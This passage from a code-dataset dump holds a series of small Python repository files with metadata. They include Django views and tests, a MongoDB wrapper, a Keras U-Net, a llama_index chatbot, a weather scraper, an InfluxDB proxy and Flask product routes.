TestViews(TestCase):\n    def test_get_features_page(self):\n        page = self.client.get(\"/features/\")\n        self.assertEqual(page.status_code, 200)\n        self.assertTemplateUsed(page, \"features.html\")\n    \n    def get_feature_detail_page(self):\n        feature = Feature({\"name\":\"test\", \"description\":\"description\"})\n        feature.save()\n        page = self.client.get(\"/feature/{0}\".format(feature.id))\n        self.assertEqual(page.status_code, 200)\n        self.assertTemplateUsed(page, \"featuredetail.html\")\n    \n    def test_get_page_for_feature_that_does_not_exist(self):\n        page = self.client.get(\"/feature/10\")\n        self.assertEqual(page.status_code, 404)\n    \n    def create_feature_page(self):\n        page = self.client.get(\"/feature/new\")\n        self.assertEqual(page.status_code, 200)\n        self.assertTemplateUsed(page, 'featureform.html')","repo_name":"dougd94/UnicornAttractor","sub_path":"features/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"34709909161","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport pysolr\n#from pymongo import MongoClient\n\nfrom db.db_helper import mongodb_helper\nfrom se.similarity import knn\nimport settings\nfrom se.statistics import distribution\n\n\n__author__ = 'sheep'\n\n\ndef search(request):\n    filtered = []\n    if 'q' in request.GET:\n        solr = pysolr.Solr('http://localhost:8983/solr/gettingstarted/',\n                           timeout=10)\n        keywords = request.GET['q']\n        results = solr.search(keywords)\n\n        vector_coll = mongodb_helper.get_coll(settings.VECTOR_COLL)\n        for r in results:\n            if vector_coll.find_one({'id': r['business_id'][0]}) is not None:\n                filtered.append(r)\n\n    return render(request, 'se.html', {'rests': filtered})\n\ndef detail(request, rest_id):\n    business_coll = mongodb_helper.get_coll(settings.BUSINESS_COLL)\n    rest_info = business_coll.find_one({'business_id': rest_id})\n    vector_coll = mongodb_helper.get_coll(settings.VECTOR_COLL)\n    rest_vec = vector_coll.find_one({'id': rest_id})\n\n    knn_ids = [id_ for _, id_ in knn.by_euclidean_distance(rest_id)]\n    knn_infos = [business_coll.find_one({'business_id': id_})\n                 for id_ in knn_ids]\n    categories = rest_info['categories']\n    knn_cat_dist = []\n    for cat, score in distribution.category_distribution(knn_ids):\n        if cat in categories:\n            knn_cat_dist.append((cat, score, True))\n            continue\n        knn_cat_dist.append((cat, score, False))\n    return render(request, 'rest.html', {'rest_info': rest_info,\n                                         'rest_vec': rest_vec,\n                                         'knn_infos': knn_infos,\n                                         'knn_cat_dist': knn_cat_dist})\n","repo_name":"cuc496/word2vecOfYelp","sub_path":"se/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"36929640594","text":"#!/usr/local/bin/python3\n\nimport cv2\nimport numpy as np\nimport os\nfrom os.path import isfile, join\n\n# Source code based on: https://medium.com/@iKhushPatel/convert-video-to-images-images-to-video-using-opencv-python-db27a128a481\n\nclass Imgs2vid:\n    @staticmethod\n    def create_video(input_folder_name, output_file_name, fps):\n        frame_array = []\n\n        files = [f for f in os.listdir(input_folder_name) if isfile(join(input_folder_name, f))]\n\n        # for sorting the 
file names properly\n        files.sort(key=lambda x: x[5:-4])\n\n        for i in range(len(files)):\n            filename = input_folder_name + files[i]\n\n            # reading each file\n            img = cv2.imread(filename)\n            height, width, layers = img.shape\n            size = (width, height)\n\n            # inserting the frames into an image array\n            frame_array.append(img)\n\n        out = cv2.VideoWriter(output_file_name, cv2.VideoWriter_fourcc(*'DIVX'), fps, size)\n\n        for i in range(len(frame_array)):\n            # writing each frame to the video\n            out.write(frame_array[i])\n        \n        out.release()\n","repo_name":"V0XNIHILI/csv2ir","sub_path":"Imgs2vid.py","file_name":"Imgs2vid.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"26447197560","text":"import pymongo\n\nclass MDBCtrl:\n    ### empty init\n    __userinfo = dict()\n    __dbname,__colname = \"socool\", \"anaresults\"\n\n    ### contain init\n    def __init__(self, **userinfo):\n        self.__userinfo = userinfo\n\n    def setUserInfo(self, port = 27017, host = \"127.0.0.1\"):\n        self.__userinfo = { \"port\" : port , \"host\" : host}\n\n    def setDBCollections(self, dbname = 'socool', colname = \"anaresults\"):\n        self.__dbname = dbname\n        self.__colname = colname\n\n    def findOneDocu(self, condition):\n        bReturn = False\n        Res = None\n\n        try:\n            client = pymongo.MongoClient(**self.__userinfo)\n            collect = client[self.__dbname][self.__colname]\n            Res = collect.find_one(condition)\n            bReturn = True\n\n        except Exception as e:\n            print(\"Find One Document Fail\")\n\n        finally:\n            return bReturn, Res\n\n    def findManyDocu(self, condition, page, ppc = 10):\n        bReturn = False\n        Res = None\n\n        try:\n            client = pymongo.MongoClient(**self.__userinfo)\n            collect = client[self.__dbname][self.__colname]\n\n            res_pageCount = collect.find(condition).count()\n            res_pageCount = 0 if res_pageCount < 1 else ((res_pageCount - 1) // ppc) + 1\n\n            res_contents = collect.find(condition).sort('date', -1).skip(page * ppc).limit(ppc)\n            bReturn = True\n\n        except Exception as e:\n            print(\"Find Many Document Fail\")\n\n        finally:\n            return bReturn, res_pageCount, res_contents\n\n    def insertOneDocu(self, docu):\n        bReturn = False\n\n        try:\n            client = pymongo.MongoClient(**self.__userinfo)\n            collect = client[self.__dbname][self.__colname]\n            collect.insert_one(docu)\n            bReturn = True\n\n        except Exception as e:\n            print(\"Insert One Document Fail\")\n\n        finally:\n            return bReturn\n\n    def insertManyDocu(self, list0):\n        bReturn = False\n\n        try:\n            client = pymongo.MongoClient(**self.__userinfo)\n            collect = client[self.__dbname][self.__colname]\n\n        except Exception as e:\n            print(\"Insert Many Document Fail\")\n            return False\n\n        for zxc0 in range(1):\n            if type(list0) != list:\n                break\n\n            bReturn = True\n\n            for docu in list0:\n                if type(docu) != dict:\n                    bReturn = False\n                    break\n\n            if bReturn != False:\n                break\n\n        if bReturn:\n            collect.insert_many(list0)\n        return bReturn\n\n    def updateOneDocu(self, condition, replace):\n        bReturn = False\n\n        try:\n            client = pymongo.MongoClient(**self.__userinfo)\n            collect = client[self.__dbname][self.__colname]\n\n            if type(condition) == dict and type(replace) == dict:\n                collect.update_one(filter=condition, update={\"$set\": replace})\n                bReturn = True\n\n        except Exception as e:\n            print(\"Update One Document Fail\")\n\n        finally:\n            return bReturn","repo_name":"CHKim777/final_1","sub_path":"machine/mongoDBController.py","file_name":"mongoDBController.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"75210786231","text":"#字典 dict 符号{} 无序\n# 1:可以存在空字典a =[]\n# 2:字典里面数据存储的方式 key:value\n# 3:字典里面的元素 根据逗号来进行分隔\n# 4: 字典里面value可以包含任何类型的数据\n\n\na = {}\nprint(type(a))\na = {\"class\":\"python11\",\n \"student\":119,\n \"teacher\":\"girl\",\n \"t_age\":20,\n \"score\":[99,88,100,5]}\n\n#字典取值: 字典[key]\nprint(a[\"score\"])\n\n#删除 pop(key)\nres = a.pop(\"teacher\")\nprint(res)\n\n#新增值 a[新key]=value 字典里面不存在的key\na[\"name\"] = \"华华\"\nprint(a)\n\n#修改 a[已存在的key] =新value 字典里面不存在的key\na[\"name\"] = \"华华\"\nprint(a)\n\n\n\n","repo_name":"gouyanzhan/daily-learnling","sub_path":"class_02/class_dict.py","file_name":"class_dict.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19054125222","text":"import time\n\nfrom selenium.webdriver.common.by import By\n\n\ndef submit_send(driver):\n try:\n button = driver.find_element(By.NAME, 'submit')\n button.click()\n time.sleep(1)\n except Exception as e:\n print(\"Submit Send Exception: {0} Message: {1}\".format(\"my message\", str(e)))\n","repo_name":"tixuz/openemis_utils","sub_path":"selenium_example/fun_submit_send.py","file_name":"fun_submit_send.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33829569055","text":"import re\nfrom pathlib import Path\n\nfrom regex_search import regex_search\n\n\ndef test_regex_search():\n phone_regex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # area code\n (\\s|-|\\.)? # separator\n (\\d{3}) # first 3 digits\n (\\s|-|\\.) # separator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))? # extension\n )''', re.VERBOSE)\n\n matches = regex_search.regex_search(phone_regex, Path('./regex_search/sample_data/'))\n\n assert len(matches) == 3\n assert 'Phone: 987-654-3210' in matches\n assert 'ph: 555-555-5555' in matches\n assert 'phone: 444-444-4444' in matches\n","repo_name":"zspatter/automate-the-boring-stuff","sub_path":"regex_search/test_regex_search.py","file_name":"test_regex_search.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"95"} +{"seq_id":"38133036305","text":"import os\nimport re\nimport setuptools\n\nNAME=\"keypad\"\nMETA_PATH = os.path.join(NAME, \"__init__.py\")\nMETA_FILE = open(META_PATH, \"r\").read()\n\ndef find_meta(meta):\n \"\"\"\n Extract __*meta*__ from META_FILE.\n \"\"\"\n meta_match = re.search(\n r\"^__{meta}__ = ['\\\"]([^'\\\"]*)['\\\"]\".format(meta=meta),\n META_FILE, re.M\n )\n if meta_match:\n return meta_match.group(1)\n raise RuntimeError(\"Unable to find __{meta}__ string.\".format(meta=meta))\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"micropython-\"+NAME,\n version=find_meta(\"version\"),\n license=find_meta(\"license\"),\n author=\"Petr Kracik\",\n author_email=\"petrkr@petrkr.net\",\n description=\"Keypad library generic matrix keypads\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/octopuslab-cz/micropython-\"+NAME,\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Development Status :: 3 - Alpha\",\n ],\n 
python_requires='>=3.4'\n)\n","repo_name":"octopuslab-cz/micropython-keypad","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"5336516083","text":"from llama_index import SimpleDirectoryReader, GPTVectorStoreIndex, PromptHelper, ServiceContext, StorageContext, set_global_service_context, load_index_from_storage\nfrom langchain.chat_models import ChatOpenAI\nimport gradio as gr\nimport sys\nimport os\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\ndef initLogging():\n sys.stdout = sys.stderr\n\ndef initOpenAI(max_tokens):\n llm = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\", max_tokens=max_tokens)\n set_global_service_context(ServiceContext.from_defaults(llm=llm))\n\ndef readDocumentsFromDisk(docs_dir):\n return SimpleDirectoryReader(input_dir=docs_dir, recursive=True).load_data()\n\ndef indexDocuments(documents):\n return GPTVectorStoreIndex.from_documents(documents, show_progress=True)\n\ndef saveIndexToDisk(index, index_dir):\n index.storage_context.persist(index_dir)\n\ndef readIndexFromDisk(index_dir):\n storage_context = StorageContext.from_defaults(persist_dir=index_dir)\n return load_index_from_storage(storage_context)\n\ndef indexDocumentsAndSave(index_dir):\n documents = readDocumentsFromDisk()\n index = indexDocuments(documents)\n saveIndexToDisk(index, index_dir)\n return index\n\ndef createChatEngine(index):\n return index.as_chat_engine(chat_mode=\"best\")\n\nsys.stdout = sys.stderr\n\nprint(\"Starting bootstrap\")\n\nDOCS_DIR = '/docs'\nINDEX_DIR = '/index'\nMAX_TOKENS = 512\n\ninitLogging()\ninitOpenAI(MAX_TOKENS)\n\nnumDocs = len(os.listdir(INDEX_DIR))\nindex = readIndexFromDisk(INDEX_DIR) if numDocs > 0 else indexDocumentsAndSave(INDEX_DIR)\n\nchat_engine = createChatEngine(index)\n\ndef chatbot(input_text):\n return chat_engine.chat(input_text).response\n\n# gr.ChatInterface(chatbot, title=\"Maia's Custom-trained AI Chatbot\").launch(share=True)\n\niface = gr.Interface(fn=chatbot,\n inputs=gr.components.Textbox(lines=7, label=\"Enter your text\"),\n outputs=\"text\",\n title=\"Maia's Custom-trained AI Chatbot\")\n\niface.launch(server_port=7860, share=True)\n","repo_name":"jcheroske/custom-gpt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34560382816","text":"\"\"\"jukifyservice URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom jukifyservice import views, views_usage_data\n\nurlpatterns = [\n url(r'^admin', admin.site.urls),\n url(r'^login', views.login),\n url(r'^user', include([\n url(r'all', views.list_users),\n url(r'(?P<user_id>[\\w]+)', include([\n url(r'groups$', views.list_groups_from_user),\n url(r'fetch', include([\n url(r'saved-tracks$', views_usage_data.save_saved_tracks),\n url(r'top-artists$', views_usage_data.save_top_artists_tracks),\n url(r'top-tracks$', views_usage_data.save_top_tracks),\n url(r'playlists$', views_usage_data.save_playlists),\n ])),\n ])),\n ])),\n url(r'^group', include([\n url(r'^$', views.groups),\n url(r'(?P<group_id>[0-9]+)$', views.group_users),\n url(r'(?P<group_id>[0-9]+)/playlist$', views.group_playlist),\n url(r'(?P<group_id>[0-9]+)/recommendations$', views.group_recommendations),\n ]))\n]\n","repo_name":"jukify/jukify-service","sub_path":"jukifyservice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2579502747","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 11 18:36:05 2017\r\n\r\n@author: Michał\r\n\"\"\"\r\nimport numpy as np\r\n\r\nfrom keras import backend as K\r\nK.set_image_dim_ordering('th')\r\nimport os \r\nfrom keras.models import Model\r\nfrom keras.layers import merge\r\nfrom keras.layers import Conv2D, MaxPooling2D,UpSampling2D,Input\r\nfrom keras.optimizers import Adam\r\n\r\n\r\n\r\nsmooth = 1.\r\n\r\ndef dice_coef(y_true, y_pred):\r\n y_true_f = K.flatten(y_true)\r\n y_pred_f = K.flatten(y_pred)\r\n intersection = K.sum(y_true_f * y_pred_f)\r\n return (2. 
* intersection + smooth) / (K.sum(y_true_f*y_true_f) + K.sum(y_pred_f*y_pred_f) + smooth)\r\n\r\n\r\ndef dice_coef_loss(y_true, y_pred):\r\n return 1.-dice_coef(y_true, y_pred)\r\n\r\nclass NeuralNetwork():\r\n \r\n def __init__(self):\r\n\r\n self.net=Model(inputs=[], outputs=[])\r\n\r\n \r\n \r\n def save(self,file):\r\n self.net.save(file)\r\n \r\n def save_weights(self,file):\r\n self.net.save_weights(file)\r\n \r\n \r\n def create(self,size=(28,28,1)):\r\n inputs=Input((size[2],size[0],size[1]))\r\n #self.net.add(Conv2D(64, (4,4), activation='relu',padding='same', input_shape=(size[2],size[0],size[1])))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n #self.net.add(Conv2D(32, (3,3),padding='same', activation='relu'))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n #self.net.add(Conv2D(16, (3,3),padding='same', activation='relu'))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Conv2D(16, (3,3),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2)))\r\n \r\n #self.net.add(Conv2D(32, (3,3),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2))) \r\n \r\n #self.net.add(Conv2D(64,(4,4),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2)))\r\n #self.net.add(Conv2D(32, 2, 2, activation='relu', input_shape=(size[2],size[0],size[1])))\r\n \r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Conv2D(16, 2, 2, activation='relu', input_shape=(size[2],size[0],size[1])))\r\n \r\n # self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Dropout(0.5))\r\n \r\n # self.net.add(Flatten())\r\n\r\n # self.net.add(Dense(size[0]*size[1], activation='relu'))\r\n \r\n #self.net.add(Conv2D(1,(1,1),padding='same',activation='softmax'))\r\n \r\n \r\n conv1 = Conv2D(16, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = Conv2D(16, (3, 3), activation='relu', padding='same')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Conv2D(32, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = Conv2D(32, (3, 3), activation='relu', padding='same')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Conv2D(64, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv3)\r\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n \r\n conv4 = Conv2D(128, (3, 3), activation='relu', padding='same')(pool3)\r\n conv4 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv4)\r\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)\r\n \r\n conv5 = Conv2D(256, (3, 3), activation='relu', padding='same')(pool4)\r\n conv5 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv5)\r\n \r\n #up6 = concatenate([UpSampling2D(size=(2, 2))(conv5), conv4], axis=3)\r\n up6 = merge([UpSampling2D(size=(2, 2))(conv5), conv4], mode='concat', concat_axis=1)\r\n conv6 = Conv2D(128, (3, 3), activation='relu', padding='same')(up6)\r\n conv6 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv6)\r\n \r\n # up7 = concatenate([UpSampling2D(size=(2, 2))(conv6), conv3], axis=3)\r\n up7=merge([UpSampling2D(size=(2, 2))(conv6), conv3], mode='concat', concat_axis=1)\r\n conv7 = Conv2D(64, (3, 3), activation='relu', padding='same')(up7)\r\n conv7 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv7)\r\n\r\n #up8 = concatenate([UpSampling2D(size=(2, 2))(conv7), conv2], axis=3)\r\n up8 = merge([UpSampling2D(size=(2, 2))(conv7), conv2], mode='concat', concat_axis=1)\r\n conv8 = 
Conv2D(32, (3, 3), activation='relu', padding='same')(up8)\r\n conv8 = Conv2D(32, (3, 3), activation='relu', padding='same')(conv8)\r\n \r\n #up9 = concatenate([UpSampling2D(size=(2, 2))(conv8), conv1], axis=3)\r\n up9 = merge([UpSampling2D(size=(2, 2))(conv8), conv1], mode='concat', concat_axis=1)\r\n \r\n conv9 = Conv2D(16, (3, 3), activation='relu', padding='same')(up9)\r\n conv9 = Conv2D(16, (3, 3), activation='relu', padding='same')(conv9)\r\n\r\n conv10 = Conv2D(1, (1, 1), activation='sigmoid')(conv9)\r\n\r\n self.net = Model(inputs=[inputs], outputs=[conv10])\r\n \r\n \r\n \r\n self.net.compile(loss=dice_coef_loss,optimizer=Adam(lr=1e-5),metrics=[dice_coef])\r\n \r\n def learn(self,data,epoch=1):\r\n self.net.fit(data[0], data[1],batch_size=2, nb_epoch=epoch, verbose=1)\r\n \r\n\r\n def load(self,size,file):\r\n \r\n if os.path.isfile(file):\r\n \r\n #self.net=load_model(file)\r\n self.create(size)\r\n self.net.load_weights(file)\r\n \r\n print(\"File loaded...\")\r\n else:\r\n print(\"File do not exist...\")\r\n \r\n def evaluate(self,data):\r\n return self.net.evaluate(data[0], data[1], verbose=1)\r\n \r\n def predict(self,inputData,outputShape):\r\n return np.reshape(self.net.predict(inputData,batch_size=1,verbose=0),outputShape)\r\n \r\n def predictSet(self,data,shape,frame):\r\n \r\n result = np.zeros((frame[0]*shape[0],frame[1]*shape[1]))\r\n \r\n for i in range(shape[0]):\r\n \r\n for j in range(shape[1]):\r\n \r\n arr=data[0][i*shape[1]+j][0]\r\n \r\n arr2=np.resize(arr,(1,1,frame[0],frame[1]))\r\n im=np.reshape(self.predict(arr2,frame),(frame[0],frame[1]))\r\n \r\n result[i*frame[0]:(i+1)*frame[0],j*frame[1]:(j+1)*frame[1]]=im\r\n os.system('cls')\r\n print(str(i*shape[1]+j+1)+\"/\"+str(shape[0]*shape[1]))\r\n \r\n return result\r\n \r\n \r\n ","repo_name":"wosiu2/VesslesIM","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28079906318","text":"# Program to add two numbers in Python\r\n#by using input from the user\r\n\r\nfrom tkinter import Y\r\n\r\n\r\nx = input(\"Enter the value of x:\")\r\ny = input(\"Enter the value of y:\")\r\n\r\nsum = int(x) + int(y)\r\nsub = int(x) - int(y)\r\nmul = int(x) * int(y)\r\nmod = int(x) % int(y)\r\ndiv = int(x) / int(y)\r\n\r\n\r\nprint(\"The addition of two numbers is:\",sum)\r\nprint(\"The subtraction of x and y is:\", sub)\r\nprint(\"The multiply value of x and y is:\", mul)\r\nprint(\"THe division of x an dy is:\", mod)\r\nprint(\"The division of x and y is:\", div)","repo_name":"Jaskirat1/Python_practise","sub_path":"Add_two_numbers.py","file_name":"Add_two_numbers.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"74321071980","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pyecharts.charts import Bar\nfrom pyecharts import options as opts\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'\n}\nALL_DATA = []\n\n\ndef parse_page(url):\n resp = requests.get(url, headers=headers)\n text = resp.content.decode('utf-8')\n soup = BeautifulSoup(text, 'html5lib')\n conMidtab = soup.find('div', class_='conMidtab')\n tables = conMidtab.find_all('table')\n for tab in tables:\n trs = tab.find_all('tr')[2:]\n for index, tr in 
enumerate(trs):\n tds = tr.find_all('td')\n city_td = tds[0]\n if index == 0:\n city_td = tds[1]\n city = list(city_td.stripped_strings)[0]\n temp_td = tds[-2]\n min_temp = list(temp_td.stripped_strings)[0]\n ALL_DATA.append({'city': city, 'min_temp': int(min_temp)})\n # print(city, min_temp)\n\n\ndef main():\n base_url = 'http://www.weather.com.cn/textFC/{}.shtml'\n area = ['hb', 'db', 'hd', 'hz', 'hn', 'xb', 'xn', 'gat']\n for x in area:\n url = base_url.format(x)\n parse_page(url)\n\n # 分析数据\n # 根据最低气温排序\n ALL_DATA.sort(key=lambda data: data['min_temp'])\n print(ALL_DATA)\n\n # 可视化\n data = ALL_DATA[0:10]\n cities = list(map(lambda x: x['city'], data))\n temps = list(map(lambda x: x['min_temp'], data))\n # chart = Bar('中国天气最低气温排行榜')\n # chart.add('', cities, temps)\n bar = (\n Bar()\n .add_xaxis(cities)\n .add_yaxis('城市',temps,category_gap=\"80%\")\n .set_global_opts(title_opts=opts.TitleOpts(title=\"中国天气最低气温排行榜\"))\n )\n bar.render('temperature.html')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xuyanbo03/python-demo","sub_path":"2.基础爬虫/bs_weather.py","file_name":"bs_weather.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"70008398700","text":"from influxdb import InfluxDBClient\nimport requests\nimport time\nimport threading\nimport logging\nfrom queue import Queue\n\n\nclass InfluxDBproxy:\n def __init__(self, dbhost: str, dbname: str, measurement_prefix: str):\n self.database = InfluxDBClient(dbhost, timeout=1, retries=1)\n self.dbname = dbname\n self.prefix = measurement_prefix\n self.isConnected = False\n self.isChecked = False\n self._stop = False\n\n self._data_queue = Queue()\n self._run_consumer = False\n self._consumer_thread = None\n\n self.logger = logging.getLogger('RKID.DBproxy')\n self.logger.setLevel(logging.DEBUG)\n\n self.check_connection()\n if not self.isConnected:\n self.logger.warning(f'Could not connect to database at {dbhost}')\n\n self.checkThread = threading.Thread(target=self.check_loop)\n self.checkThread.start()\n\n def stop_checking(self):\n self.logger.info(\"Stopping database proxy\")\n self._stop = True\n if self.checkThread is not None:\n self.checkThread.join()\n self.checkThread = None\n self.logger.info(\"Database proxy stopped\")\n\n def check_connection(self):\n self._perform_on_db(self.database.ping)\n return self.isConnected\n\n def _set_connected(self):\n if not self.isConnected:\n self.logger.warning('Connected to database')\n self.isConnected = True\n\n def _set_disconnected(self):\n if self.isConnected:\n self.logger.warning('Disconnected from database')\n self.isConnected = False\n\n def check_loop(self):\n while not self._stop:\n prev_status = self.isChecked\n new_status = self.check_connection()\n\n if not prev_status and new_status:\n self.prepare_db()\n\n time.sleep(3)\n\n def prepare_db(self):\n dbs = self.database.get_list_database()\n # create database if not exists\n if not {'name': self.dbname} in dbs:\n self.database.create_database(self.dbname)\n\n # switch to database\n self.database.switch_database(self.dbname)\n self.isChecked = True\n\n def save_data(self, data: dict):\n name = data.pop('name')\n db_json = [{\n \"measurement\": self.prefix + '_' + name,\n \"fields\": data,\n \"tags\": {}\n }]\n\n if self.isConnected:\n try:\n self.database.write_points(db_json)\n return True\n except requests.exceptions.ConnectTimeout:\n self.isChecked = False\n self.logger.warning('Connection lost to DB')\n return False\n 
else:\n return False\n\n def get_list_measurements(self):\n if self.isConnected:\n measurements = self._perform_on_db(self.database.get_list_measurements)\n\n names = []\n for measurement in measurements:\n names.append(measurement['name'])\n\n return names\n\n raise ConnectionError(\"Isn't connected to database!\")\n\n def get_measurement(self, measurement_name: str):\n # influxdb only supports bind params in WHERE clause\n # https://docs.influxdata.com/influxdb/v1.7/tools/api/#bind-parameters\n return self._perform_on_db(self.database.query,\n query=f'SELECT * FROM \"{measurement_name}\"')\n\n def delete_measurement(self, measurement_name: str):\n self._perform_on_db(self.database.drop_measurement, measurement_name)\n\n def _perform_on_db(self, function, *args, **kwargs):\n try:\n ret = function(*args, **kwargs)\n self._set_connected()\n return ret\n except requests.exceptions.ConnectTimeout:\n self._set_disconnected()\n\n def push_data(self, data):\n self._data_queue.put(data)\n\n def _consumer_function(self):\n while self._run_consumer:\n msg_num = 0\n line_protocol_data = []\n while not self._data_queue.empty():\n while msg_num < 5000 and not self._data_queue.empty():\n data = self._data_queue.get()\n line_protocol_data.append(self.data2lineprotocol(data))\n try:\n self.database.write_points(line_protocol_data, protocol='line')\n except requests.exceptions.ConnectTimeout:\n self.logger.warning('Connection lost to DB')\n\n time.sleep(0.010)\n\n def data2lineprotocol(self, data: dict):\n name = data.pop('name')\n measurement = self.prefix + '_' + name\n measurement = measurement.replace(' ', '_')\n\n fields = [f'{str(key)}={str(data[key])}'.replace(' ','_') for key in data.keys()]\n line = f'{measurement} {\",\".join(fields)}'\n return line\n\n def start_consumer(self):\n self._consumer_thread = threading.Thread(target=self._consumer_function)\n self._run_consumer = True\n self._consumer_thread.start()\n\n def stop_consumer(self):\n self._run_consumer = False\n if self._consumer_thread is not None:\n self._consumer_thread.join()\n\n self._consumer_thread = None\n","repo_name":"izsoandras/robonaut_rekeszkutato_gui","sub_path":"utils/InfluxDBproxy.py","file_name":"InfluxDBproxy.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7871910879","text":"from flask import render_template, flash, redirect,request\nfrom . 
import products\nfrom werkzeug.utils import secure_filename\nfrom .forms import NewProductForm, EditProductForm\nimport app\nimport os\n\n@products.route('/')\ndef index():\n p = app.models.Producto.query.all()\n return render_template('list.html', productos = p)\n\n@products.route('/create', methods =[ 'GET' , 'POST'])\ndef create():\n p = app.models.Producto()\n form_registro = NewProductForm()\n if form_registro.validate_on_submit():\n form_registro.populate_obj(p)\n p.imagen = form_registro.imagen.data.filename\n app.db.session.add(p)\n app.db.session.commit()\n\n ##return os.getcwd()\n file = form_registro.imagen.data\n filename = secure_filename(file.filename)\n file.save(os.path.abspath(os.getcwd() + '/app/products/images/' + filename))\n\n flash(\"registro exitoso\")\n return redirect('/products')\n return render_template('new.html', form=form_registro)\n\n@products.route('/edit/<product_id>' , methods =[ 'GET' , 'POST'])\ndef edit(product_id):\n p = app.models.Producto.query.get(product_id)\n form_edit = EditProductForm(obj = p)\n if form_edit.validate_on_submit():\n form_edit.populate_obj(p)\n app.db.session.commit()\n return \"actualizacion exitosa\"\n return render_template(\"new.html\" , form = form_edit)\n\n@products.route('/holitas')\ndef holitas():\n return render_template(\"new.html\")\n\n\n","repo_name":"Elshaman/xpo2","sub_path":"app/products/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12495509683","text":"def leiaint(msg):\n while True:\n try:\n n = 